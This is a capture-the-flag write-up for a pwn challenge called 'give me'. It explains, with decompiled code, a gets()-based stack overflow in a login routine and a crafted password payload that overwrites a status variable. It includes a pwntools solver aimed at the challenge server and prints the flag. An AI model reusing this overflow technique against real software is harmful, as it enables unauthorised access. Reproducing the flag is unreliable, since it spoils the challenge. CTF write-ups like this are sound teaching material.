give me

Challenge Description

Author : anakmamah

Maafkan soal yang gampang ini 🙏🏻, probset nya skill issue

Flag

HOLOGY7{1ts_4lw4ys_0v3rfl0w_Vu1n_h3R3}

Analysis and Solution

We are given an executable, so we need to decompile it using Ghidra. From the decompilation results, we are given a menu application where we can register, login, view profile, logout and exit.

  // snip
  do {
    while( true ) {
      puts("\n--- Menu ---");
      puts("1. Register");
      puts("2. Login");
      puts("3. View Profile");
      puts("4. Logout");
      puts("5. Exit");
      printf("Choose an option: ");
      __isoc99_scanf(&DAT_00102327,&local_38);
      getchar();
      if (local_38 < 6) break;
      if (local_38 == 69) {
        add_credits(&local_30,local_34);
      }
      else {
switchD_001016e4_caseD_5:
        puts("Invalid choice. Try again.");
      }
    }
    // snip

From the login function, we can see a gets function called to get the password. Which means this function is vulnerable to a buffer overflow attack. From the code flow, we can infer if our username is A and our password is s3cr3tpass and our local_c value is yek, then we can access a new feature to add credits.

void login(char *param_1,undefined4 *param_2,undefined4 *param_3)

{
  int iVar1;
  char local_38 [44];
  uint local_c;
  
  local_c = 0;
  puts("Enter your username: ");
  fgets(param_1,8,stdin);
  puts("Enter your password: ");
  gets(local_38);
  printf("You entered: %s\n",local_38);
  printf("Your status is: %d\n",(ulong)local_c);
  iVar1 = strcmp(local_38,"s3cr3tpass");
  if (iVar1 == 0) {
    puts("Login successful!");
    *param_2 = 1;
    if ((local_c == 0x79656b) && (*param_1 == 'A')) {
      *param_3 = 1;
      puts("Feature unlocked: You can now add credits!");
    }
    else {
      puts("Feature locked: You cannot add credits yet.");
    }
    return;
  }
  puts("Invalid password. Try again.");
                    /* WARNING: Subroutine does not return */
  exit(1);
}

Since the program does not change the local_c variable, we need to leverage a buffer overflow to overwrite the local_c variable. To do that, we need to put in s3cr3tpass where this is the value we need to have to pass the strcmp check. Then we need to concatenate 34 null bytes, where 34 is the array size of local_38 subtracted by the length of s3cr3tpass. The null bytes acts as the string termination character while also filling up our buffer. Then we need to concatenate yek to pass the local_c check. But since the payload will be interpreted using little-endian, we will concatenate key instead.

# Password Payload
b"s3cr3tpass" + b"\x00"*34+ b"key"

After entering the username and password, we should be allowed to access the new feature. From the menu code, we can access the add_credits function by entering 69 as the option on the menu (nice).

From the add_credits code, we need to input the value of calculate_value() to get to the congrats() function. The value of calculate_value() is simply 3735991189. After entering the value, the congrats() function will return our flag.

void add_credits(uint *param_1,int param_2)

{
  int local_10;
  uint local_c;
  
  if (param_2 == 0) {
    puts("Access denied! You need to unlock this feature first.");
  }
  else {
    puts("Wow, how did u find me :O");
    printf("Enter the amount of credits to add: ");
    __isoc99_scanf(&DAT_0010225d,&local_10);
    *param_1 = local_10 + *param_1;
    printf("Credits added! Total credits: %d\n",(ulong)*param_1);
    local_c = calculate_value();
    if (local_c == *param_1) {
      puts(" Accessing secret...");
      congrats();
    }
  }
  return;
}

Solver Script

from pwn import *
import re

r = remote('103.175.221.20', 3333)
r.recvuntil(b"option: ")
r.sendline(b"2")
r.recvuntil(b"username: \r\n")
r.sendline(b"A")
r.recvuntil(b"password: \r\n")
r.sendline(b"s3cr3tpass"+b"\x00"*34+b"key")
r.recvuntil(b"option: ")
r.sendline(b"69")
r.recvuntil(b"add: ")
r.sendline(b"3735991189")

print(re.findall(r"HOLOGY7{.*}", r.recv().decode())[0])

Last updated 4 months ago

// snip do { while( true ) { puts("\n--- Menu ---"); puts("1. Register"); puts("2. Login"); puts("3. View Profile"); puts("4. Logout"); puts("5. Exit"); printf("Choose an option: "); __isoc99_scanf(&DAT_00102327,&local_38); getchar(); if (local_38 < 6) break; if (local_38 == 69) { add_credits(&local_30,local_34); } else { switchD_001016e4_caseD_5: puts("Invalid choice. Try again."); } } // snip

void login(char *param_1,undefined4 *param_2,undefined4 *param_3) { int iVar1; char local_38 [44]; uint local_c; local_c = 0; puts("Enter your username: "); fgets(param_1,8,stdin); puts("Enter your password: "); gets(local_38); printf("You entered: %s\n",local_38); printf("Your status is: %d\n",(ulong)local_c); iVar1 = strcmp(local_38,"s3cr3tpass"); if (iVar1 == 0) { puts("Login successful!"); *param_2 = 1; if ((local_c == 0x79656b) && (*param_1 == 'A')) { *param_3 = 1; puts("Feature unlocked: You can now add credits!"); } else { puts("Feature locked: You cannot add credits yet."); } return; } puts("Invalid password. Try again."); /* WARNING: Subroutine does not return */ exit(1); }

void add_credits(uint *param_1,int param_2) { int local_10; uint local_c; if (param_2 == 0) { puts("Access denied! You need to unlock this feature first."); } else { puts("Wow, how did u find me :O"); printf("Enter the amount of credits to add: "); __isoc99_scanf(&DAT_0010225d,&local_10); *param_1 = local_10 + *param_1; printf("Credits added! Total credits: %d\n",(ulong)*param_1); local_c = calculate_value(); if (local_c == *param_1) { puts(" Accessing secret..."); congrats(); } } return; }

from pwn import * import re r = remote('103.175.221.20', 3333) r.recvuntil(b"option: ") r.sendline(b"2") r.recvuntil(b"username: \r\n") r.sendline(b"A") r.recvuntil(b"password: \r\n") r.sendline(b"s3cr3tpass"+b"\x00"*34+b"key") r.recvuntil(b"option: ") r.sendline(b"69") r.recvuntil(b"add: ") r.sendline(b"3735991189") print(re.findall(r"HOLOGY7{.*}", r.recv().decode())[0])